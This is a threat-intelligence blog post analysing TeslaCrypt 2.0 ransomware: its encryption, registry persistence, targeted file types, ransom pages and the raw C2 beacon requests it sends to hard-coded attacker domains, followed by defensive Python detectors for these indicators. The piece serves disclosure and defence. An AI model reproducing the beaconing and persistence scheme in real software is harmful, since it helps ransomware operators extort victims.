Monitoring TeslaCrypt…
As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and provide analysis to our clients on new and emerging threats. As you can imagine, we naturally run into large quantities of malware on a daily basis. From time to time, we release findings to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions. Below is a write-up on TeslaCrypt 2.0 – we hope that you find this useful and that it helps you better protect your organization from this threat.
Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.
Key Points:
• TeslaCrypt/AlphaCrypt uses AES256 encryption. The AES key is generated using a SHA256 hash and due to the keys being stored on the infected machine, victims in many cases could likely decrypt files without paying the ransom.
• The newest variant, TeslaCrypt 2.0, uses the same encryption algorithm; however, the keys and other configuration data are stored in the Windows Registry instead of a file on the local disk (as in previous versions). This version masquerades as CryptoWall.
• The command and control (C&C) communications for new variants use the same AES256 encryption for any traffic to the attacker’s server; in previous variants, only Base64 encoding was used.
Malware Capabilities
TeslaCrypt is a C++ compiled binary that begins encrypting files on infected machines immediately after execution. Notably, this family does not require an Internet connection or contact with the command and control (C&C) server to begin file encryption; it uses its own internal hashing routines to generate the key material and encrypt files.
After launch, the first attempted network communication is to an IP lookup service. However, some early versions immediately try to contact the C&C instead of resolving the external IP address. If a connection can be established, the malware then includes that IP address in a “ping” to the attackers’ C&C. The network traffic for some variants is Base64 encoded, while others use the same encryption algorithm as the file encryption, AES256.
The malware authors appear to be resilient at adapting to public disclosures of their malware. Since its release, the tool’s landing pages, ransom messages and decryption pages have changed several times. Initially, this malware masqueraded as CryptoLocker, but self-labeled as TeslaCrypt within the decryption page. Shortly thereafter, the attackers changed the TeslaCrypt name to “AlphaCrypt.” A subsequent version did not have any identifying “name,” but the latest version, TeslaCrypt 2.0, is masquerading as CryptoWall, going so far as to include near-identical content on the ransom message, decryption service and payment pages.
Distribution
iSIGHT Partners assesses that TeslaCrypt may be distributed through a variety of methods.
• TeslaCrypt has been distributed through a variety of exploit kits, including Angler, Sweet Orange and Nuclear Exploit.
• Since the malware encrypts files associated with various games, attackers may attempt to distribute it through channels likely to infect gamers. These could include, for example, malicious game-themed advertisements or posts on gaming-related forums.
• Ransomware developers often sell copies of their ransomware for other eCrime actors to use as desired, or establish business relationships in which distributors spread centrally controlled ransomware in return for a percentage of profits. Either type of arrangement can result in a specific type of ransomware being spread using disparate tactics.
Responsible Actors
Which actors or groups are responsible for developing and/or using TeslaCrypt is uncertain. Numerous actors are currently involved in ransomware operations, and observed characteristics of TeslaCrypt campaigns have been insufficient to tie the malware to specific perpetrators.
The malware’s aforementioned references to CryptoLocker and CryptoWall do not necessarily indicate that TeslaCrypt’s operators are associated with the actors behind either of these other malware types.
• Unassociated ransomware types frequently show similarities, potentially for reasons such as their developers are reusing code taken from other malware or wish to capitalize on public attention to other malware.
• The term “CryptoLocker” is treated in many eCrime communities as a generic label for any type of ransomware (i.e., locker) that encrypts. Also, the public prominence of CryptoLocker has caused a variety of actors to mimic it. So, the presence in a ransomware variant of the string “CryptoLocker” or visual similarities to CryptoLocker are not indicative of attribution to any particular actor.
Analysis of TeslaCrypt 2.0
iSIGHT Partners has analyzed several copies of TeslaCrypt/AlphaCrypt malware variants to date. The binary itself does not share any significant code with other known families, but the original ransom splash screen bears a striking resemblance to that of CryptoLocker, and the attackers have hard-coded several indicators claiming that the malware is CryptoLocker. In several binaries, the attackers label this malware as “CryptoLocker v3.” However, the splash screens, ransom messages and decryption pages differ across variants. The newest version, TeslaCrypt 2.0, mimics CryptoWall, another type of ransomware, while multiple other variants self-label as “TeslaCrypt” or “AlphaCrypt,” names unique to this family.
The following analysis is centered on the emergence of TeslaCrypt 2.0, which has much in common with previous variants, but some changes are noteworthy regarding the malware characteristics and behavioral analysis in the following section. A sample we analyzed has a compile date of Aug. 9, 2015. The malware disguises itself as a Microsoft executable as seen below:
In some of the very early variants/versions of TeslaCrypt, the operators appeared to target gaming and media-related files for encryption. However, the attackers have since expanded the targeted file types to include most common file types. The following is the list of file types targeted by TeslaCrypt 2.0:
Targeted File Extensions (alphabetical; the original seven-column table is flattened into one list):
.3fr, .7z, .accdb, .ai, .apk, .arch00, .arw, .asset, .avi, .bar, .bay, .bc6, .bc7, .big, .bik, .bkf, .bkp, .blob, .bsa, .cas, .cdr, .cer, .cfr, .cr2, .crt, .crw,
.css, .csv, .d3dbsp, .das, .dazip, .db0, .dba, .dbf, .dcr, .der, .desc, .dmp, .dng, .doc, .docm, .docx, .dwg, .dxg, .epk, .eps, .erf, .esm, .ff, .flv, .forge, .fos, .fpk,
.fsh, .gdb, .gho, .hkdb, .hkx, .hplg, .hvpl, .ibank, .icxs, .indd, .itdb, .itl, .itm, .iwd, .iwi, .jpe, .jpeg, .jpg, .js, .kdb, .kdc, .kf, .layout, .lbf, .litemod, .lrf, .ltx,
.lvl, .m2, .m3u, .m4a, .map, .mcmeta, .mdb, .mdbackup, .mddata, .mdf, .mef, .menu, .mlx, .mov, .mp4, .mpqge, .mrwref, .ncf, .nrw, .ntl, .odb, .odc, .odm, .odp, .ods, .odt, .orf,
.p12, .p7b, .p7c, .pak, .pdd, .pdf, .pef, .pem, .pfx, .pkpass, .png, .ppt, .pptm, .pptx, .psd, .psk, .pst, .ptx, .py, .qdf, .qic, .r3d, .raf, .rar, .raw, .rb, .re4, .rgss3a,
.rim, .rofl, .rtf, .rw2, .rwl, .sav, .sb, .sid, .sidd, .sidn, .sie, .sis, .slm, .snx, .sql, .sr2, .srf, .srw, .sum, .svg, .syncdb, .t12, .t13, .tax, .tor, .txt, .upk,
.vcf, .vdf, .vfs0, .vpk, .vpp_pc, .vtf, .w3x, .wb2, .wma, .wmo, .wmv, .wotreplay, .wpd, .wps, .x3f, .xf, .xlk, .xls, .xlsb, .xlsm, .xlsx, .xxx, .zip, .ztmp
The TeslaCrypt malware is continually under development as seen from the changes in the malware’s encryption, ransom messages, naming, targeted file extensions and decryption pages. This latest variant of the malware is masquerading as CryptoWall complete with the same ransom pages and decryption pages. However, the network traffic for this variant still resembles the original malware and is distinguishable from CryptoWall.
The following is a screenshot of the splash page displayed. It is mostly indistinguishable from the initial CryptoWall page.
As seen in the above screenshot, the URLs are indicative of TeslaCrypt/AlphaCrypt rather than CryptoWall. CryptoWall typically uses Tor2Web URLs as the default, but this ransomware uses them only as a backup and follows the same URL schema as earlier variants of the malware. Also, the “Personal Code” seen in the URI path aligns with the latest variants of TeslaCrypt/AlphaCrypt. This personal code is synonymous with the “install_id” seen in the network traffic in the sections below.
This “personal code” is used in the creation and naming of a registry key, which contains the BTC address and encryption key for the malware. In previous variants the malware stored this data in a “key.dat” or “storage.bin” file. Although some of the earlier variants also copied this data into a different registry key, it was usually a duplicate copy of the “key.dat” file.
The encryption of the files and the algorithm used has not changed since the previous variants; the malware still uses AES256. As a result of this data still residing on the infected machine via the Windows Registry, it is possible to decrypt files if the keys can be extracted from this location before they are deleted (if they are deleted).
The following image shows the Windows Registry key with this entry created.
For each encrypted file, a three-character extension is appended to the end of the file name. We have observed two distinct three-letter trigraphs for TeslaCrypt 2.0, “.aaa” and “.zzz”. After all files have been encrypted, the malware displays the above ransom message. After navigating to the provided URL for the “personal PAGE,” the victim finds instructions that include the following: links to purchase Bitcoin, a unique Bitcoin address for payment and an input field to verify payment of the ransom. The current asking price to decrypt the files is set at 1.95 BTC, or approximately $500.
The following image depicts this data as well as a “draft” tracker for payments sent to the Bitcoin address (we used an invalid address for testing purposes):
Persistence Method:
The malware uses the same persistence method as previous variants with slightly different file naming schemes:
• Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<personal code>
• VALUE: C:\Users\<user>\AppData\Roaming\svckew.exe
• Modification: ADD
• Note: persistence key
Registry Modifications:
As noted above, the main Windows Registry key created is the one to store the malware “configuration” or “data.”
• Key: HKCU\Software\<personal code> (e.g., 55CA21CDC91A1AB9)\data
• VALUE: 1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7….
• Modification: ADD
Note: This key contains data and flags that the malware sets. It starts with the BTC address, then lists the key, followed by flags for whether shadow files were deleted and whether the key was sent to the server, and finally the infection timestamp.
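Taken together, the persistence entry, the configuration key and the .aaa/.zzz file naming give a responder three host-side checks. The following Python script is an added example written for this post, not iSIGHT's tooling: it parses a constructed .reg export modelled on the entries above (the personal code, Run value and Bitcoin address follow the post's examples; the bytes after the address in the data value are a placeholder, because the post does not give that layout), flags the two registry indicators, and splits an encrypted file name back into its original name and trigraph.

```python
import re
from typing import List, Optional, Tuple

# Constructed .reg-style export for this example. The personal code, Run value
# and Bitcoin address follow the post's examples; the bytes after the address in
# the "data" value are a placeholder, since the post does not give that layout.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"55CA21CDC91A1AB9"="C:\\Users\\victim\\AppData\\Roaming\\svckew.exe"
"OneDrive"="C:\\Users\\victim\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"

[HKEY_CURRENT_USER\Software\55CA21CDC91A1AB9\data]
@="1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7<KEY-AND-FLAGS-PLACEHOLDER>"
"""

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
# A 16-hex-character "personal code" names both the Run value and the config key.
PERSONAL_CODE_RE = re.compile(r"^[0-9A-F]{16}$", re.I)
CONFIG_KEY_RE = re.compile(r"^HKEY_CURRENT_USER\\Software\\[0-9A-F]{16}(?:\\data)?$", re.I)
# Legacy Base58 ('1' or '3' prefixed) Bitcoin address at the start of the data blob.
BTC_ADDR_RE = re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}")
REG_KEY_RE = re.compile(r"^\[(.+)\]$")
REG_VALUE_RE = re.compile(r'^(@|"[^"]*")="(.*)"$')
ENCRYPTED_TRIGRAPHS = (".aaa", ".zzz")


def parse_reg_export(text: str) -> List[Tuple[str, str, str]]:
    """Flatten a .reg export into (key_path, value_name, string_data) tuples.
    Only REG_SZ string values are handled, which is all this check needs."""
    entries = []
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = REG_KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        value_match = REG_VALUE_RE.match(line)
        if value_match and current_key is not None:
            name = value_match.group(1)
            name = "(Default)" if name == "@" else name.strip('"')
            # Undo .reg escaping of quotes and backslashes.
            data = value_match.group(2).replace('\\"', '"').replace("\\\\", "\\")
            entries.append((current_key, name, data))
    return entries


def find_registry_indicators(entries: List[Tuple[str, str, str]]) -> List[str]:
    """Return one alert string per TeslaCrypt 2.0 registry indicator found."""
    alerts = []
    for key, name, data in entries:
        # Persistence: a Run value named with the personal code that points into %APPDATA%\Roaming.
        if (key.lower() == RUN_KEY.lower() and PERSONAL_CODE_RE.match(name)
                and "\\appdata\\roaming\\" in data.lower()):
            alerts.append(f"persistence: Run value {name} -> {data}")
        # Configuration: HKCU\Software\<personal code>[\data] whose data opens with a BTC address.
        if CONFIG_KEY_RE.match(key):
            addr = BTC_ADDR_RE.match(data)
            if addr:
                alerts.append(f"config: {key} begins with BTC address {addr.group(0)}")
    return alerts


def split_encrypted_name(filename: str) -> Optional[Tuple[str, str]]:
    """Return (original_name, trigraph) for a file carrying an appended .aaa/.zzz
    trigraph, or None if the name shows no sign of encryption."""
    lower = filename.lower()
    for trigraph in ENCRYPTED_TRIGRAPHS:
        if lower.endswith(trigraph) and len(filename) > len(trigraph):
            return filename[: -len(trigraph)], trigraph
    return None


if __name__ == "__main__":
    for alert in find_registry_indicators(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(alert)
    print(split_encrypted_name("Q3-budget.xlsx.aaa"))
```

On a live host the same checks can be run against a `reg export HKCU` dump; the personal-code-named Run value is the higher-confidence signal, since legitimate software rarely names its Run entry with 16 hex characters, while a data value that merely begins with a Bitcoin address should be confirmed against the key path before acting on it.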
Command & Control Communications
Most of the previous TeslaCrypt variants we have analyzed used Base64 encoding for the check-in traffic and the “ping” request that sends data about the infected machine to the C&C server. However, this variant uses AES encryption in the same vein as the file encryption. The malware will still query a specified URL in order to retrieve the external IP address of the infected machine. After this request, it will then beacon to one of several hard-coded URLs in the malware to report on the infection, send keys, etc.
The first request to retrieve the IP address is listed below:
GET http://ipinfo.io/ip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: ipinfo.io
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Aug 2015 12:39:37 GMT
Server: nginx/1.4.6 (Ubuntu)
Content-Length: 15
Connection: keep-alive
<external IP address>
The next request includes the characteristics of the infected machine (encrypted and decrypted examples shown):
Encrypted:
GET http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804FD704B43166264942AB4248A83B5E7984901B8CB83E4B03844C46DCB4954E3FFAF30A6C250BC7D5EE85FD829061B4E956DD5240A45CCDC990C7AAFD008A7CB3CE52B9C6ECDF865AD4C051F4FD373197B9CE23CB1AFA50735DC624D9D782165F4EA6F30E5CA559DB32B2D4CFBDB22F13F55F7DC7EC2FA46DB8EA5309CD076C1F9E309C72801FC173A9747937D0E35D62A3B965447EBFDF69E4C770C3704AB729577B486369BD381148EBB781C26F68A4FA7497830FDEC2D847A9C6B29E91BA475109FF6E185D0B020ED1DBA8F04C2DAA313787189E3A6F393860FEE93CDD42191 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Host: ezglobalmarketing.com
Connection: Keep-Alive
Decrypted Data:
Subject=Ping&key=A3F3A56C23EAE8A77D645AD05AFBD624CF19EFC43811EC391E6936A2B28DD731&addr=1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7&size=0&version=2.0.5&OS=2600&ID=0&gate=ezglobalmarketing.com&ip=<external IP>&inst_id=55CA21CDC91A1AB9
NOTE: This version identifies itself as 2.0.5, hence the name TeslaCrypt 2.0. Previous variants used incremental versioning such as .0.3.5a or .0.4.1.
HTTP/1.1 200 OK
Date: Tue, 11 Aug 2015 12:39:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
19
—!!!INSERTED!!!—
1
0
The third communication is a report back to the C&C and includes the “personal code” or unique ID of the infected machine:
GET http://aep554w4fm8j.fflroe598qu.com/55CA21CDC91A1AB9 HTTP/1.1
Host: aep554w4fm8j.fflroe598qu.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
The following hard-coded domains (excluding the IP lookup domain) were retrieved from the TeslaCrypt 2.0 variant analyzed:
• ezglobalmarketing.com
• ledshoppen.nl
• teenpornotube.org
• shmetterheath.ru
• fgainterests.com
• serenitynowbooksandgifts.com
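The three requests above (IP lookup, AES-encrypted ping to a gate, then a bare personal-code check-in) are the network fingerprint a defender can look for, and the decrypted Ping body carries the fields worth pivoting on. The Python below is an added example, not code from the post or from iSIGHT: it classifies each request in a constructed proxy log (the hosts and personal code are the ones shown above; the client addresses, timestamps and log format are made up), flags clients that show the beacon pattern, and parses the decrypted Ping into its fields.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Gate domains hard-coded in the analyzed TeslaCrypt 2.0 sample, as listed in the post.
GATE_DOMAINS = {
    "ezglobalmarketing.com",
    "ledshoppen.nl",
    "teenpornotube.org",
    "shmetterheath.ru",
    "fgainterests.com",
    "serenitynowbooksandgifts.com",
}
IP_LOOKUP = ("ipinfo.io", "/ip")
# The encrypted ping is a bare hex blob as the whole query string; the third
# request's only distinguishing feature is a 16-hex-character path.
HEX_BLOB_RE = re.compile(r"^[0-9A-F]{32,}$", re.I)
PERSONAL_CODE_PATH_RE = re.compile(r"^/[0-9A-F]{16}$", re.I)

# Constructed proxy log: "<time> <client> <method> <url>". Hosts and the personal
# code come from the post; clients and times are invented. The hex query is the
# first 64 characters of the encrypted ping shown above.
SAMPLE_PROXY_LOG = """\
12:39:20 10.0.0.7 GET http://ipinfo.io/ip
12:39:25 10.0.0.7 GET http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804FD704B43166264942AB4248A83B5E798
12:39:30 10.0.0.7 GET http://aep554w4fm8j.fflroe598qu.com/55CA21CDC91A1AB9
12:40:01 10.0.0.9 GET http://example.com/wp-content/themes/r.php?page=2
12:40:05 10.0.0.9 GET http://ipinfo.io/ip
"""

# Decrypted Ping body quoted from the post.
SAMPLE_PING = ("Subject=Ping&key=A3F3A56C23EAE8A77D645AD05AFBD624CF19EFC43811EC391E6936A2B28DD731"
               "&addr=1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7&size=0&version=2.0.5&OS=2600&ID=0"
               "&gate=ezglobalmarketing.com&ip=<external IP>&inst_id=55CA21CDC91A1AB9")


def classify_request(url: str) -> Optional[str]:
    """Map one request URL to a TeslaCrypt 2.0 beacon stage, or None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if (host, parts.path) == IP_LOOKUP:
        return "ip-lookup"
    # Require the hex blob so ordinary traffic to a theme .php page is not flagged.
    if host in GATE_DOMAINS and parts.path.endswith(".php") and HEX_BLOB_RE.match(parts.query):
        return "encrypted-ping"
    if PERSONAL_CODE_PATH_RE.match(parts.path) and not parts.query:
        return "personal-code-checkin"
    return None


def scan_proxy_log(log_text: str) -> Dict[str, List[str]]:
    """Collect the beacon stages seen per client, in the order they occurred."""
    stages: Dict[str, List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        _time, client, _method, url = fields
        stage = classify_request(url)
        if stage:
            stages[client].append(stage)
    return dict(stages)


def infected_clients(log_text: str) -> List[str]:
    """Flag a client on an encrypted ping to a known gate (strong signal), or on an
    IP lookup followed by a personal-code check-in (weaker, combined signal)."""
    flagged = []
    for client, seen in scan_proxy_log(log_text).items():
        if "encrypted-ping" in seen:
            flagged.append(client)
        elif "ip-lookup" in seen and "personal-code-checkin" in seen:
            flagged.append(client)
    return flagged


def parse_ping(decrypted: str) -> Dict[str, str]:
    """Split a decrypted Ping body (URL-style key=value pairs) into a flat dict."""
    return {k: v[0] for k, v in parse_qs(decrypted, keep_blank_values=True).items()}


def ping_iocs(decrypted: str) -> Dict[str, str]:
    """Pull the fields an analyst pivots on out of a decrypted Ping."""
    f = parse_ping(decrypted)
    return {
        "install_id": f.get("inst_id", ""),
        "btc_address": f.get("addr", ""),
        "gate": f.get("gate", ""),
        "version": f.get("version", ""),
        "key": f.get("key", ""),
    }


if __name__ == "__main__":
    print(infected_clients(SAMPLE_PROXY_LOG))
    print(ping_iocs(SAMPLE_PING))
```

The IP lookup and the 16-hex-character path are each too common to alert on alone, so the scanner only raises on the encrypted ping to a listed gate or on the two weaker stages appearing together for one client; the gate list should be treated as a starting point, since the post notes the operators rotate infrastructure between variants.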
Let Us Know if We Can Help…
We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. If you’d like to learn more about what we do in monitoring the cyber crime underground, register for our upcoming webinar (9.18.15). If you would like to get a deeper look at our intelligence around cyber crime, feel free to request a free trial.
Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!
The post TeslaCrypt 2.0: Cyber Crime Malware Behavior, Capabilities and Communications appeared first on iSIGHT Partners.